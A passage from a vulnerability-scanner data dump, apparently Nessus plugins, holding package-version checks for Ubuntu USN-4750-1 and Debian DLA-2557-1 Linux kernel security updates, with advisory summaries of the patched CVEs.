script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem-osp1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04-edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021 Canonical, Inc. / NASL script (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2020-25669', 'CVE-2020-27815', 'CVE-2020-27830', 'CVE-2020-28588', 'CVE-2020-28941', 'CVE-2020-29568', 'CVE-2020-29569', 'CVE-2020-29660', 'CVE-2020-29661', 'CVE-2021-20177');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-4750-1');\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1010-gkeop', 'pkgver': '5.4.0-1010.11~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1029-raspi', 'pkgver': '5.4.0-1029.32~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1036-gke', 'pkgver': '5.4.0-1036.38~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1037-gcp', 'pkgver': '5.4.0-1037.40~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1038-aws', 'pkgver': '5.4.0-1038.40~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1038-oracle', 'pkgver': '5.4.0-1038.41~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-1040-azure', 'pkgver': '5.4.0-1040.42~18.04.1'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-66-generic', 'pkgver': '5.4.0-66.74~18.04.2'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-66-generic-lpae', 'pkgver': '5.4.0-66.74~18.04.2'},\n {'osver': '18.04', 'pkgname': 'linux-image-5.4.0-66-lowlatency', 'pkgver': '5.4.0-66.74~18.04.2'},\n {'osver': '18.04', 'pkgname': 'linux-image-aws', 'pkgver': '5.4.0.1038.22'},\n {'osver': '18.04', 'pkgname': 'linux-image-aws-edge', 'pkgver': '5.4.0.1038.22'},\n {'osver': '18.04', 'pkgname': 'linux-image-azure', 'pkgver': '5.4.0.1040.20'},\n {'osver': '18.04', 'pkgname': 'linux-image-azure-edge', 'pkgver': '5.4.0.1040.20'},\n {'osver': '18.04', 'pkgname': 'linux-image-gcp', 'pkgver': '5.4.0.1037.24'},\n {'osver': '18.04', 'pkgname': 'linux-image-gcp-edge', 'pkgver': '5.4.0.1037.24'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-hwe-18.04', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-hwe-18.04-edge', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-lpae-hwe-18.04', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-lpae-hwe-18.04-edge', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-gke-5.4', 'pkgver': '5.4.0.1036.38~18.04.4'},\n {'osver': '18.04', 'pkgname': 'linux-image-gkeop-5.4', 'pkgver': '5.4.0.1010.11~18.04.11'},\n {'osver': '18.04', 'pkgname': 'linux-image-lowlatency-hwe-18.04', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-lowlatency-hwe-18.04-edge', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-oem', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-oem-osp1', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-oracle', 'pkgver': '5.4.0.1038.41~18.04.21'},\n {'osver': '18.04', 'pkgname': 'linux-image-oracle-edge', 'pkgver': '5.4.0.1038.41~18.04.21'},\n {'osver': '18.04', 'pkgname': 'linux-image-raspi-hwe-18.04', 'pkgver': '5.4.0.1029.32'},\n {'osver': '18.04', 'pkgname': 'linux-image-raspi-hwe-18.04-edge', 'pkgver': '5.4.0.1029.32'},\n {'osver': '18.04', 'pkgname': 'linux-image-snapdragon-hwe-18.04', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-snapdragon-hwe-18.04-edge', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-virtual-hwe-18.04', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '18.04', 'pkgname': 'linux-image-virtual-hwe-18.04-edge', 'pkgver': '5.4.0.66.74~18.04.61'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1010-gkeop', 'pkgver': '5.4.0-1010.11'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1029-raspi', 'pkgver': '5.4.0-1029.32'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1033-kvm', 'pkgver': '5.4.0-1033.34'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1037-gcp', 'pkgver': '5.4.0-1037.40'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1038-aws', 'pkgver': '5.4.0-1038.40'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1038-oracle', 'pkgver': '5.4.0-1038.41'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-1040-azure', 'pkgver': '5.4.0-1040.42'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-66-generic', 'pkgver': '5.4.0-66.74'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-66-generic-lpae', 'pkgver': '5.4.0-66.74'},\n {'osver': '20.04', 'pkgname': 'linux-image-5.4.0-66-lowlatency', 'pkgver': '5.4.0-66.74'},\n {'osver': '20.04', 'pkgname': 'linux-image-aws', 'pkgver': '5.4.0.1038.39'},\n {'osver': '20.04', 'pkgname': 'linux-image-azure', 'pkgver': '5.4.0.1040.38'},\n {'osver': '20.04', 'pkgname': 'linux-image-gcp', 'pkgver': '5.4.0.1037.46'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic-hwe-18.04', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic-hwe-18.04-edge', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic-lpae', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic-lpae-hwe-18.04', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-generic-lpae-hwe-18.04-edge', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-gkeop', 'pkgver': '5.4.0.1010.13'},\n {'osver': '20.04', 'pkgname': 'linux-image-gkeop-5.4', 'pkgver': '5.4.0.1010.13'},\n {'osver': '20.04', 'pkgname': 'linux-image-kvm', 'pkgver': '5.4.0.1033.31'},\n {'osver': '20.04', 'pkgname': 'linux-image-lowlatency', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-lowlatency-hwe-18.04', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-lowlatency-hwe-18.04-edge', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-oem', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-oem-osp1', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-oracle', 'pkgver': '5.4.0.1038.35'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi-hwe-18.04', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi-hwe-18.04-edge', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi2', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi2-hwe-18.04', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-raspi2-hwe-18.04-edge', 'pkgver': '5.4.0.1029.64'},\n {'osver': '20.04', 'pkgname': 'linux-image-virtual', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-virtual-hwe-18.04', 'pkgver': '5.4.0.66.69'},\n {'osver': '20.04', 'pkgname': 'linux-image-virtual-hwe-18.04-edge', 'pkgver': '5.4.0.66.69'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux-image-5.4.0-1010-gkeop / linux-image-5.4.0-1029-raspi / etc');\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-20T09:47:25", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2020-27815\n\nA flaw was reported in the JFS filesystem code allowing a local\nattacker with the ability to set extended attributes to cause a denial\nof service.\n\nCVE-2020-27825\n\nAdam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace ring\nbuffer resizing logic due to a race condition, which could result in\ndenial of service or information leak.\n\nCVE-2020-27830\n\nShisong Qin reported a NULL pointer dereference flaw in the Speakup\nscreen reader core driver.\n\nCVE-2020-28374\n\nDavid Disseldorp discovered that the LIO SCSI target implementation\nperformed insufficient checking in certain XCOPY requests. An attacker\nwith access to a LUN and knowledge of Unit Serial Number assignments\ncan take advantage of this flaw to read and write to any LIO\nbackstore, regardless of the SCSI transport settings.\n\nCVE-2020-29568 (XSA-349)\n\nMichael Kurth and Pawel Wieczorkiewicz reported that frontends can\ntrigger OOM in backends by updating a watched path.\n\nCVE-2020-29569 (XSA-350)\n\nOlivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\nflaw which can be triggered by a block frontend in Linux blkback. A\nmisbehaving guest can trigger a dom0 crash by continuously connecting\n/ disconnecting a block frontend.\n\nCVE-2020-29660\n\nJann Horn reported a locking inconsistency issue in the tty subsystem\nwhich may allow a local attacker to mount a read-after-free attack\nagainst TIOCGSID.\n\nCVE-2020-29661\n\nJann Horn reported a locking issue in the tty subsystem which can\nresult in a use-after-free. A local attacker can take advantage of\nthis flaw for memory corruption or privilege escalation.\n\nCVE-2020-36158\n\nA buffer overflow flaw was discovered in the mwifiex WiFi driver which\ncould result in denial of service or the execution of arbitrary code\nvia a long SSID value.\n\nCVE-2021-3347\n\nIt was discovered that PI futexes have a kernel stack use-after-free\nduring fault handling. An unprivileged user could use this flaw to\ncrash the kernel (resulting in denial of service) or for privilege\nescalation.\n\nCVE-2021-20177\n\nA flaw was discovered in the Linux implementation of string matching\nwithin a packet. A privileged user (with root or CAP_NET_ADMIN) can\ntake advantage of this flaw to cause a kernel panic when inserting\niptables rules.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.19.171-2~deb9u1.\n\nWe recommend that you upgrade your linux-4.19 packages.\n\nFor the detailed security status of linux-4.19 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/linux-4.19\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-16T00:00:00", "title": "Debian DLA-2557-1 : linux-4.19 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3347", "CVE-2020-27830", "CVE-2020-27825", "CVE-2020-27815", "CVE-2020-29569", "CVE-2020-36158", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-28374", "CVE-2020-29660"], "modified": "2021-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-arm64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-marvell", "p-cpe:/a:debian:debian_linux:linux-source-4.19", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-i386", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-perf-4.19", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-arm64", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-armmp-dbg", "p-cpe:/a:debian:debian_linux:linux-support-4.19.0-0.bpo.10", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-686", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-marvell-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-marvell", "p-cpe:/a:debian:debian_linux:linux-doc-4.19", "p-cpe:/a:debian:debian_linux:linux-config-4.19", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-common-rt", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-armmp", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-686-pae", "p-cpe:/a:debian:debian_linux:linux-kbuild-4.19", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rpi", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-lpae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-arm64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-armel", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rpi", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rpi-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-arm64-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-arm64", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-cloud-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-armhf", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-common", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-cloud-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-cloud-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-arm64", "p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-arm64", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2557.NASL", "href": "https://www.tenable.com/plugins/nessus/146512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2557-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146512);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2020-27815\", \"CVE-2020-27825\", \"CVE-2020-27830\", \"CVE-2020-28374\", \"CVE-2020-29568\", \"CVE-2020-29569\", \"CVE-2020-29660\", \"CVE-2020-29661\", \"CVE-2020-36158\", \"CVE-2021-20177\", \"CVE-2021-3347\");\n\n script_name(english:\"Debian DLA-2557-1 : linux-4.19 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2020-27815\n\nA flaw was reported in the JFS filesystem code allowing a local\nattacker with the ability to set extended attributes to cause a denial\nof service.\n\nCVE-2020-27825\n\nAdam 'pi3' Zabrocki reported a use-after-free flaw in the ftrace ring\nbuffer resizing logic due to a race condition, which could result in\ndenial of service or information leak.\n\nCVE-2020-27830\n\nShisong Qin reported a NULL pointer dereference flaw in the Speakup\nscreen reader core driver.\n\nCVE-2020-28374\n\nDavid Disseldorp discovered that the LIO SCSI target implementation\nperformed insufficient checking in certain XCOPY requests. An attacker\nwith access to a LUN and knowledge of Unit Serial Number assignments\ncan take advantage of this flaw to read and write to any LIO\nbackstore, regardless of the SCSI transport settings.\n\nCVE-2020-29568 (XSA-349)\n\nMichael Kurth and Pawel Wieczorkiewicz reported that frontends can\ntrigger OOM in backends by updating a watched path.\n\nCVE-2020-29569 (XSA-350)\n\nOlivier Benjamin and Pawel Wieczorkiewicz reported a use-after-free\nflaw which can be triggered by a block frontend in Linux blkback. A\nmisbehaving guest can trigger a dom0 crash by continuously connecting\n/ disconnecting a block frontend.\n\nCVE-2020-29660\n\nJann Horn reported a locking inconsistency issue in the tty subsystem\nwhich may allow a local attacker to mount a read-after-free attack\nagainst TIOCGSID.\n\nCVE-2020-29661\n\nJann Horn reported a locking issue in the tty subsystem which can\nresult in a use-after-free. A local attacker can take advantage of\nthis flaw for memory corruption or privilege escalation.\n\nCVE-2020-36158\n\nA buffer overflow flaw was discovered in the mwifiex WiFi driver which\ncould result in denial of service or the execution of arbitrary code\nvia a long SSID value.\n\nCVE-2021-3347\n\nIt was discovered that PI futexes have a kernel stack use-after-free\nduring fault handling. An unprivileged user could use this flaw to\ncrash the kernel (resulting in denial of service) or for privilege\nescalation.\n\nCVE-2021-20177\n\nA flaw was discovered in the Linux implementation of string matching\nwithin a packet. A privileged user (with root or CAP_NET_ADMIN) can\ntake advantage of this flaw to cause a kernel panic when inserting\niptables rules.\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.19.171-2~deb9u1.\n\nWe recommend that you upgrade your linux-4.19 packages.\n\nFor the detailed security status of linux-4.19 please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/linux-4.19\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/02/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/linux-4.19\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/linux-4.19\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3347\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-config-4.19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-4.19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-arm64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-arm64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-cloud-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-common-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rpi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-arm64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.19.0-0.bpo.10-rt-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-arm64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-arm64-dbg\");\n script_set_attribute(attribute:\"cpe\", 